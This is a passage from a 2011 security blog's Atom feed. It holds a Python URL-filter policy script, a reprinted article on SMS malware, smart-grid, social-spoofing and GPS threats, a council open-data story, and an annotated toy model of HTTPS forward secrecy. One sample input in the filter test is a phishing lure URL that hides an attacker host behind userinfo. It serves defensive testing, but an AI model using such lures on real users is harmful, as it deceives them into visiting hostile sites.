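        return ("allow", "not in a blocked category")
    exc = matching_exception(host, urlsplit(url).path or "/", user_groups)
    if exc is not None:
        return ("allow", "exception: " + exc["name"])
    return ("block", "category: " + category)


# Constructed sample requests (assumption): URL plus the requester's groups.
SAMPLE_REQUESTS = [
    ("https://www.slideshare.net/someone/roadmap-2012", ("sales",)),
    ("https://www.slideshare.net/acmecorp/product-brochure", ("marketing",)),
    ("https://www.slideshare.net/acmecorp/product-brochure", ("sales",)),
    ("http://slideshare.net@evil.example/phish", ("sales",)),
    ("https://notslideshare.net/", ("sales",)),
    ("https://DOCS.GOOGLE.COM./presentation/d/abc", ("training",)),
]


def evaluate_all(requests=SAMPLE_REQUESTS):
    """Run the policy over the sample requests."""
    return [(url, evaluate(url, groups)) for url, groups in requests]


if __name__ == "__main__":
    for url, (verdict, reason) in evaluate_all():
        print(verdict.upper().ljust(6), url, "(" + reason + ")")
```

The anonymous roadmap upload is blocked, the marketing team's own SlideShare space is allowed only for marketing, a lookalike domain does not match by substring, and the lure with userinfo in the URL is judged by its real host.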

  The other issue with URL filtering is that it isn't in effect when an 
employee goes off our network. Of course, laptops can be configured to 
force all network traffic over a VPN, and software can push URL content 
filtering rules to each laptop, but those are the sorts of things we 
can't afford to do. I have data leak prevention in my budget for 2012, 
and that will help prevent nonpublic data from leaving the company.   
   
&lt;br /&gt;

  But without solid technical controls, we will have to rely on stern words and employees' sense of responsibility. &lt;br /&gt;


&lt;i&gt;This week's journal is written by a real security manager, &lt;b&gt;"Mathias Thurman,"&lt;/b&gt; whose name and employer have been disguised for obvious reasons. Contact him at &lt;a href="mailto:mathias_thurman@yahoo.com"&gt;mathias_thurman@yahoo.com&lt;/a&gt;.
   
&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
  
   
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-6783461681090087289?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/JoTA9tVx6iA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/6783461681090087289/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/11/security-managers-journal-sensitive.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/6783461681090087289?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/6783461681090087289?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/JoTA9tVx6iA/security-managers-journal-sensitive.html" title="Security Manager's Journal: Sensitive company data gets released into the wild" /><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/11/security-managers-journal-sensitive.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUEGRX0-cCp7ImA9WhRRFE0.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-757559043540302048</id><published>2011-11-27T14:14:00.001Z</published><updated>2011-11-27T14:20:24.358Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-27T14:20:24.358Z</app:edited><title>Four rising threats from 
cybercriminals</title><content type="html">
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div id="first_paragraph"&gt;
&lt;span class="source"&gt;Computerworld -&lt;/span&gt; 
Criminal hackers never sleep, it seems. Just when you think you've 
battened down the hatches and fully safeguarded yourself or your 
business from electronic security risks, along comes a new exploit to 
keep you up at night. It might be an SMS text message with a malevolent 
payload or an errant signal designed to jam GPS receivers. &lt;/div&gt;
Whether you're protecting corporate data or simply trying to keep your 
personal files safe, these threats -- some rapidly growing, others still
 emerging -- put your systems at risk. Fortunately, security procedures 
and tools are available to help you win the fight. &lt;br /&gt;
 &lt;h3&gt;
1. Text-message malware &lt;/h3&gt;
While smartphone viruses are still fairly rare, text-message attacks 
are becoming more common, according to Rodney Joffe, senior vice 
president and senior technologist at mobile messaging company Neustar 
and director of the &lt;a href="http://www.confickerworkinggroup.org/wiki/" target="new"&gt;Conficker Working Group&lt;/a&gt;,
 a coalition of security researchers that came together to fight the 
malware known as Conficker. PCs are fairly well protected today, he 
says, so some black-hat hackers are now targeting mobile devices. Their 
incentive is mostly financial: Text messaging provides a way to break 
into devices and make money. &lt;br /&gt;
 Khoi Nguyen, group product manager for mobile security at Symantec, confirmed that text-message attacks aimed at smartphone
 operating systems are commonplace now that people are increasingly 
reliant on mobile devices. It's not just consumers who are at risk, he 
adds. Any employee who falls for a text-message ruse using a company 
smartphone can jeopardize the business's network and data and possibly 
cause a compliance violation. &lt;br /&gt;
 "This is a similar type of attack 
as [is used on] a computer -- an SMS or MMS message that includes an 
attachment, disguised as a funny or sexy picture, which asks the user to
 open it," Nguyen explains. "Once they download the picture, it will 
install malware on the device. Once loaded, it would acquire access 
privileges, and it spreads through contacts on the phone, [who] would 
then get a message from that user." &lt;br /&gt;
 In this way, says Joffe, 
hackers create botnets for sending text-message spam with links to a 
product the hacker is selling, usually charging you per message. In some
 cases, he adds, the malware even starts buying ring tones that are 
charged on your wireless bill, lining the pockets of the hacker selling 
the ring tones. &lt;br /&gt;
 Wireless carriers say they do try to stave off 
the attacks. For instance, Verizon spokeswoman Brenda Raney says the 
company scans for known malware attacks, isolates them on the cellular 
network, and even works with federal crime units to block them. &lt;br /&gt;
 
To keep such malware off users' phones, Joffe recommends that businesses
 institute strict corporate policies limiting whom employees can text 
using company networks and phones, and what kind of work can be done via
 text messaging. Another option is a policy that prohibits text 
messaging entirely, at least until the industry figures out how to deal 
with the threats.&lt;br /&gt;
&lt;h3&gt;
2. Hacking into smart grids &lt;/h3&gt;
A common misconception is that 
only open networks -- say, corporate wireless LANs that visitors may use
 -- are hackable. Not true, says Justin Morehouse, a principal 
consultant at Stratum Security who spoke about network security
 at last year's DefCon hacker convention. Morehouse says it's actually 
not that difficult to find an access point for a so-called closed 
system. &lt;br /&gt;
 Some nuclear plants and power grids have wireless 
networks that are vulnerable to attack. And supervisory control and data
 acquisition (SCADA) systems aren't safe either. &lt;br /&gt;
 For example, the Stuxnet worm
 last year infected tens of thousands of Windows PCs running Siemens 
SCADA systems in manufacturing and utility companies, most notably in 
Iran. It was largely spread via infected USB flash drives.
 "Stuxnet proved that it is relatively simple to cause potentially 
catastrophic damage" to an industrial control network, says Neustar's 
Joffe. &lt;br /&gt;
 According to Morehouse, another new attack point will be 
smart grids that use electronic metering to streamline power management.
 Utility companies around the world have begun testing and rolling out 
smart grids to homes and businesses. The technology, which can send data
 to and receive it from a central system, can also be very helpful for 
IT: You can open a console to see the power usage for one section of a 
building, for example. &lt;br /&gt;
 But smart grids might be vulnerable to attacks
 that would allow nefarious hackers to cut off electricity at homes and 
businesses and wreak other kinds of havoc. One possible attack vector is
 a smart grid's communications infrastructure. For example, Morehouse 
says, a German utility company called Yello Strom uses a consumer smart 
grid system that works like a home automation kit -- the sensors report 
energy usage back to the central server via the user's home Wi-Fi 
network. &lt;br /&gt;
 The most effective preventive measure, says Morehouse, 
is rigid isolation -- a smart grid should not touch any other network. 
Given the dangers that can arise if a hacker gains access to a smart 
grid, he says, companies should conduct penetration tests and make sure 
that firewalls in closed networks are secure. He advises using tools 
such as Core Impact and Metasploit. &lt;br /&gt;
 &lt;h3&gt;
3. Social network account spoofing &lt;/h3&gt;
Users of Facebook,
 LinkedIn and other social networks are vulnerable to attacks that rely 
on account spoofing. A scammer poses as either someone you know or a 
friend of a friend, in order to fool you into revealing personal 
information. He then uses that information to gain access to your other 
accounts and eventually steal your identity. &lt;br /&gt;
 In a typical 
exploit, says Joffe, someone contacts you on a site like Facebook or 
LinkedIn, pretending to be a friend of a friend or a co-worker of 
someone you trust. Then, this new "friend" contacts you directly through
 text message or email. The correspondence seems legitimate because you 
believe he has a connection with an individual you trust.&lt;br /&gt;
 In another scenario, a scammer might impersonate someone you already
 know -- claiming to be an old friend from high school, for instance. 
Spoofers can find out your connections by following your public feeds or
 looking up the names of co-workers on sites like LinkedIn, where you've
 posted your work information. &lt;br /&gt;
 Once the scammer has established a
 connection with you, he uses devious means to steal personal data, such
 as chatting online to find out the names of your family members, 
favorite bands, hobbies and other seemingly innocuous information. Then 
he uses that information to try to guess your passwords or answers to 
security questions for banking sites, webmail accounts or other online 
services. &lt;br /&gt;
 Morehouse describes another type of attack that 
targets companies as well as individuals. The spoofer might set up a 
Facebook page that claims to be the official company page for, say, a 
major retailer. The spoofer might claim that the page is a formal method
 to contact the company or register complaints. &lt;br /&gt;
 The page might 
offer fake coupons to entice people to join, and it soon goes viral as 
people share it with their friends. Once hundreds or thousands of users 
have joined the page, says Morehouse, the owner tricks them into giving 
out personal information, perhaps by signing up for additional coupons 
or special offers. &lt;br /&gt;
 This ends up being a double attack: Consumers
 are harmed because their personal data is compromised, and the company 
is harmed because its customers now associate the fake Facebook page 
with the real company -- and decide not to buy from that company 
anymore. &lt;br /&gt;
 Joffe says there is no way to prevent a criminal from 
setting up a fake Facebook page, but companies can use monitoring tools 
such as Social Mention to see how the company name is being used online.
 If an unauthorized page turns up, companies can ask the social network 
to remove the fake listing. &lt;br /&gt;
 &lt;h3&gt;
4. GPS jamming: Threat or nuisance? &lt;/h3&gt;
An emerging criminal tactic -- interfering with GPS signals -- has 
security experts divided on just how harmful it could become. &lt;br /&gt;
 
Jamming a GPS signal at the source is next to impossible, says Phil 
Lieberman, founder of enterprise security vendor Lieberman Software. 
Blocking the radio signals that are broadcast from orbiting GPS 
satellites would require a massive countertransmission. And because the 
satellites are operated by the U.S. military, jamming them would be 
considered an act of war and a federal crime, says Lieberman. &lt;br /&gt;
 However, it is easy to jam GPS receivers using low-cost jamming devices like &lt;a href="http://gadget.brando.com/car-cigarette-anti-gps-system_p00963c024d001.html" target="new"&gt;one sold by Brando&lt;/a&gt;.
 The devices jam a receiver by overloading it with a signal that's 
similar to the real GPS signal. The receiver then becomes confused 
because it can't find a steady satellite transmission.&lt;br /&gt;
&lt;br /&gt;
 Lieberman doesn't give much credence to fears about jammers 
disrupting airplanes or air traffic control systems, because those 
networks use a completely different GPS signal from the one we use in 
cars and handheld devices. Jamming could, however, be a potentially 
dangerous issue when it comes to financial records, he says, because GPS
 devices are used in the banking industry to add time stamps to 
financial transactions. Although completely blocking transactions would 
be difficult, Lieberman says, an industrious hacker could theoretically 
disrupt transactions and cause headaches for banks. &lt;br /&gt;
 Security 
expert Roger Johnston, a systems engineer at the Argonne National 
Laboratory in Chicago, says spoofing GPS signals is the greater danger, 
explaining that GPS receivers are low-power devices that latch on to any
 strong signal. He says spoofing could be used for serious crimes -- 
tricking a delivery truck driver into turning down a dark alley, 
changing the time stamps on financial transactions, delaying emergency 
vehicles from finding their routes. There have been no reported cases of
 GPS spoofing to commit a criminal act, but Johnston warns that the 
government and businesses should work to deter such attacks. &lt;br /&gt;
 
Taking some extra precautions -- using strong encryption technology, 
engaging only with trusted friends on social networks, and using 
penetration testing software on corporate networks -- can alleviate some
 fears and help you sleep at night, even if the bad guys keep coming up 
with new exploits. &lt;br /&gt;
 &lt;i&gt;&lt;b&gt;Brandon &lt;/b&gt;is a former IT manager at a
 Fortune 100 company who now writes about technology. He's written more 
than 2,500 articles in the past 10 years. Follow his tweets at &lt;a href="http://twitter.com/#%21/jmbrandonbb" target="new"&gt;@jmbrandonbb&lt;/a&gt;.&lt;/i&gt;&lt;br /&gt;
 &lt;i&gt;This version of this story was originally published in &lt;/i&gt;Computerworld&lt;i&gt;'s print edition. It was adapted from &lt;a href="http://www.computerworld.com/s/article/9216603/Six_rising_threats_from_cybercriminals"&gt;an article&lt;/a&gt; that appeared earlier on &lt;/i&gt;Computerworld.com.&lt;br /&gt;

                
                
                                                
                        
                                                

                
     &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-757559043540302048?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/ky95wCpRS8I" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/757559043540302048/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/11/four-rising-threats-from-cybercriminals.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/757559043540302048?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/757559043540302048?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/ky95wCpRS8I/four-rising-threats-from-cybercriminals.html" title="Four rising threats from cybercriminals" /><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/11/four-rising-threats-from-cybercriminals.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUQAR30zfCp7ImA9WhRRE0s.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-2250984634997429756</id><published>2011-11-27T03:09:00.001Z</published><updated>2011-11-27T03:09:06.384Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-27T03:09:06.384Z</app:edited><title>Shock: Council dumps data wad - doesn't break any 
laws</title><content type="html">
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
Surrey county council has launched a website which brings together a wide range of information on the area.&lt;br /&gt;


Named Surrey-i, the local authority said that the website will 
provide residents with data on issues such as roads covered by gritting 
trucks in severe winter weather, care homes offering places for the 
elderly and crime rates on local streets.&lt;br /&gt;


Peter Martin, deputy leader of the council, told GGC that the local 
authority holds large amounts of information and that it was right to 
share it with residents.&lt;br /&gt;

"It's all about transparency. We want to make as much information 
available to the public as they want. So for example, if you've just 
moved to Surrey you'll be able to see where the nearest schools are and 
so on," he said. "In a sense it's like a Wikipedia for Surrey."&lt;br /&gt;


The website has a built-in map, and by entering their postcode 
residents can find services and facilities in their community. These 
include the nearest schools and libraries, as well as information on 
local doctors, hospitals, charities and councillors. Other features will
 allow people to find their closest railway station, bus stop, dentist 
or beauty spot.&lt;br /&gt;


The site was soft-launched in September on a restricted basis, but is
 now fully available to everyone. Martin said that the project is 
ongoing and will continue to evolve. He revealed that if there is an 
appetite for it, people may be able to have the service as an app on 
their mobile phones in future.&lt;br /&gt;


"But we're just at the experimental stage at the moment, so we'll 
monitor and track what people say about the service," he added.&lt;br /&gt;


Martin said that people trying to provide services in the area will 
also find the tool useful as there will be data for businesses to 
access, such as workforce skills, the county's economic performance and 
the success of start-ups.&lt;br /&gt;


The site was developed by the council on behalf of the Surrey 
strategic partnership, which includes the local authority, borough and 
district councils, the Surrey County Association of Parish Town 
Councils, Surrey police, NHS Surrey and the voluntary and business 
sectors. As part of the launch, the council is also tweeting a fact an 
hour from the website during this week.&lt;br /&gt;


Surrey council said that other public bodies like the health service 
and police are already using the website to help them plan more 
integrated services and target their resources better. The council is 
currently using the website as part of a review of buildings which aims 
to make sure they continue to be in the right location to provide the 
best services for residents.&lt;br /&gt;


This article was originally published at &lt;a href="http://www.guardian.co.uk/government-computing-network/2011/nov/24/surrey-county-council-website"&gt;Guardian Government Computing&lt;/a&gt;.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-2250984634997429756?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/XJyE33B4-7U" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/2250984634997429756/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/11/shock-council-dumps-data-wad-doesnt.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/2250984634997429756?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/2250984634997429756?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/XJyE33B4-7U/shock-council-dumps-data-wad-doesnt.html" title="Shock: Council dumps data wad - doesn't break any laws" /><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/11/shock-council-dumps-data-wad-doesnt.html</feedburner:origLink></entry><entry 
gd:etag="W/&quot;A0QMQH4zeip7ImA9WhRRE0g.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-4002405248949709934</id><published>2011-11-27T02:02:00.001Z</published><updated>2011-11-27T02:03:01.082Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-27T02:03:01.082Z</app:edited><title>Google protects HTTPS-enabled services against future attacks</title><content type="html">
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div id="first_paragraph"&gt;
&lt;span class="source"&gt;IDG News Service -&lt;/span&gt; 
Google has modified the encryption method used by its HTTPS-enabled 
services including Gmail, Docs and Google+, in order to prevent current 
traffic from being decrypted in the future when technological advances 
make this possible.&lt;/div&gt;
The majority of today's HTTPS implementations
 use a private key known only by the domain owner to generate session 
keys that are subsequently used to encrypt traffic between the servers 
and their clients.&lt;br /&gt;
 This approach exposes the connections to 
so-called retrospective decryption attacks. "In ten years time, when 
computers are much faster, an adversary could break the server private 
key and retrospectively decrypt today's email traffic," explained Adam 
Langley, a member of Google's security team, in a &lt;a href="http://googleonlinesecurity.blogspot.com/2011/11/protecting-data-for-long-term-with.html"&gt;blog post&lt;/a&gt;.&lt;br /&gt;
 In
 order to mitigate this relatively low but real security risk, Google 
has implemented an encryption property known as forward secrecy, which 
involves using different private keys to encrypt sessions and deleting 
them after a period of time.&lt;br /&gt;
 In this way, an attacker who manages
 to break or steal a single key won't be able to recover a significant 
quantity of email traffic that spans months of activity, Langley said. 
In fact, he pointed out that not even the server admin will be able to 
decrypt HTTPS traffic retroactively.&lt;br /&gt;
 Because SSL wasn't designed 
to support key exchange mechanisms capable of forward secrecy by 
default, the Google engineers had to design an extension for the popular
 OpenSSL toolkit. This was integrated into OpenSSL 1.0.1, which has yet 
to be released as a stable version.&lt;br /&gt;
 The new Google HTTPS 
implementation uses ECDHE_RSA for key exchange and the RC4_128 cipher 
for encryption. Unfortunately, this combination is only supported in 
Firefox and Chrome at the moment, which means that HTTPS connections on 
Internet Explorer will not benefit from the added security.&lt;br /&gt;
 This 
isn't necessarily a problem with Internet Explorer, which does support a
 combination of EDH (Ephemeral Diffie-Hellman) key exchange and RC4. 
EDH also provides forward secrecy, but Google chose ECDHE (Elliptic 
curve Diffie-Hellman) instead for performance reasons.&lt;br /&gt;
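As an added illustration (not code from the article, from Google or from OpenSSL), the toy Python model below contrasts the two designs the post describes: a session key that depends on the server's single long-term secret, versus one derived from per-session ephemeral values that are discarded. The DH group, the HMAC standing in for the RSA signature, and the XOR stream cipher standing in for RC4 are assumptions chosen so it runs offline with the standard library only.

```python
"""Toy model of forward secrecy (constructed illustration, standard library
only): what a recorded session reveals once the server's long-term key leaks."""
import hashlib
import hmac
import secrets

# Assumed toy group: the Curve25519 field prime as a plain DH modulus, base 2.
# Real deployments use 2048-bit MODP groups or the ECDHE curves the post names.
P = 2**255 - 19
G = 2

def random_secret():
    """A private exponent in [2, P-1)."""
    return secrets.randbelow(P - 2) + 2

def derive_key(shared):
    """Session key = SHA-256 of the shared group element (toy KDF)."""
    return hashlib.sha256(shared.to_bytes(32, "big")).digest()

def keystream_xor(key, data):
    """Toy stream cipher standing in for RC4_128: XOR with a SHA-256 counter
    keystream. Symmetric, so the same call encrypts and decrypts."""
    blocks = (len(data) + 31) // 32
    ks = b"".join(hashlib.sha256(key + i.to_bytes(4, "big")).digest()
                  for i in range(blocks))
    return bytes(x ^ y for x, y in zip(data, ks))

def static_session(server_secret, message):
    """Pre-forward-secrecy design, modelled as static DH (standing in for RSA
    key transport): the session key is a function of the server's single
    long-term secret plus values that appear on the wire."""
    server_pub = pow(G, server_secret, P)   # published once, reused all year
    a = random_secret()                     # client ephemeral
    key = derive_key(pow(server_pub, a, P))
    return {"mode": "static", "client_pub": pow(G, a, P),
            "ciphertext": keystream_xor(key, message)}

def ephemeral_session(server_secret, message):
    """Forward-secret design: a fresh server ephemeral b per session, signed
    with the long-term key (an HMAC tag models the RSA signature of
    ECDHE_RSA), then b is discarded."""
    a, b = random_secret(), random_secret()
    client_pub, server_eph = pow(G, a, P), pow(G, b, P)
    tag = hmac.new(server_secret.to_bytes(32, "big"),
                   server_eph.to_bytes(32, "big"), "sha256").digest()
    key = derive_key(pow(server_eph, a, P))  # G**(a*b) mod P on both sides
    del a, b                                 # ephemeral secrets deleted
    return {"mode": "ephemeral", "client_pub": client_pub,
            "server_eph": server_eph, "tag": tag,
            "ciphertext": keystream_xor(key, message)}

def verify_server_eph(recording, server_secret):
    """All the long-term key does in ephemeral mode: authenticate server_eph."""
    expected = hmac.new(server_secret.to_bytes(32, "big"),
                        recording["server_eph"].to_bytes(32, "big"),
                        "sha256").digest()
    return hmac.compare_digest(expected, recording["tag"])

def retrospective_decrypt(recording, leaked_server_secret):
    """The adversary from the post: a recording plus, years later, the
    server's long-term secret. Returns the plaintext if it is recomputable."""
    if recording["mode"] == "static":
        shared = pow(recording["client_pub"], leaked_server_secret, P)
        return keystream_xor(derive_key(shared), recording["ciphertext"])
    # Ephemeral: the key needed exponent a or b, neither of which involved the
    # long-term key or still exists, so there is nothing to recompute.
    return None
```

Running both sessions with the same long-term secret and then handing that secret to retrospective_decrypt shows the static recording fully recovered and the ephemeral one not, which is the property Langley describes.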
 The 
company plans to add support for IE in the future and hopes that its 
example will encourage other service providers that use HTTPS to 
implement forward secrecy so that one day it can become the norm for 
online traffic encryption.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-4002405248949709934?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/Nmgbx2wlwSk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/4002405248949709934/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/11/google-protects-https-enabled-services.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/4002405248949709934?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/4002405248949709934?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/Nmgbx2wlwSk/google-protects-https-enabled-services.html" title="Google protects HTTPS-enabled services against future attacks" /><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/11/google-protects-https-enabled-services.html</feedburner:origLink></entry></feed>

